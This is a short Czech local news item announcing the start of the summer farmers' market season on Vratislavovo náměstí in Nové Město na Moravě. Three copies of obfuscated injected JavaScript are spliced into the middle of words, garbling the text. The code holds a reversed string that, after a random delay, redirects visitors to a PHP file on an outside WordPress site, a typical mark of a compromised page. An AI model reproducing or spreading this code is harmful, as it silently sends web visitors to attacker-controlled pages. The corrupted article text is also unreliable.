farmářský trh
Rainbow page separator

Letní sezona farmářských trhů začíná v sobotu

Pátek, 9. května 2014

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Masné a mléčné výrobky, koření, včelařské produkty a v neposlední řadě široký sortiment sazenic, skalniček, ovocných stromků či květin nabídne návštěvníkům farmářský trh na novoměstském Vratislavově náměstí. Uskuteční se v sobotu 10. května od osmi hodin do poledne.
Tou[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to akcí začíná le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní letní sezona farmářských trhů na Vratislavově náměstí – budou se konat vždy každou druhou sobotu až do 11. října a zájemci na nich najdou rozsáhlou nabídku produktů a specialit od prvovýrobců převážně z oblasti Novoměstska.
Ke každému trhu bude připraven doprovodný program, workshop před Horáckým muzeem a hudební produkce na náměstí, případně divadlo v muzeu. Sobotní první „letní“ trh oživí pletení košíků a koncert dechové kapely Bobrůvanka.